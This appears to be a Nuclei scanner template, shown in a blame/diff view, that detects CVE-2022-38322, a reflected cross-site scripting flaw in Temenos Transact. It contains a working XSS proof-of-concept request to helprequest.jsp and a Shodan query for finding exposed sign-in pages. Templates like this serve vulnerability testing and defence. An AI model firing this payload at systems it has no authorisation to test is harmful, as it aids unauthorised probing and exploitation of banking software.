2024-07-18 06:47:06 +00:00
|
|
|
id: CVE-2022-38322
|
|
|
|
|
|
|
|
|
|
info:
|
2024-07-23 06:42:31 +00:00
|
|
|
name: Temenos Transact - Cross-Site Scripting
|
2024-07-18 06:47:06 +00:00
|
|
|
author: qotoz
|
|
|
|
|
severity: high
|
|
|
|
|
description: |
|
|
|
|
|
Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.
|
|
|
|
|
reference:
|
|
|
|
|
- https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/
|
|
|
|
|
metadata:
|
|
|
|
|
verified: true
|
|
|
|
|
max-request: 1
|
|
|
|
|
shodan-query: http.title:"transact sign in","t24 sign in"
|
|
|
|
|
tags: cve,cve2022,temenos,transact,xss
|
|
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"
|
|
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
part: body
|
|
|
|
|
words:
|
|
|
|
|
- setupHelp('')" onerror="confirm('document.domain')
|
|
|
|
|
|
2024-07-23 06:42:31 +00:00
|
|
|
- type: word
|
|
|
|
|
part: content_type
|
|
|
|
|
words:
|
|
|
|
|
- 'text/html'
|
|
|
|
|
|
2024-07-23 06:45:46 +00:00
|
|
|
- type: status
|
2024-07-18 06:47:06 +00:00
|
|
|
status:
|
|
|
|
|
- 200
|
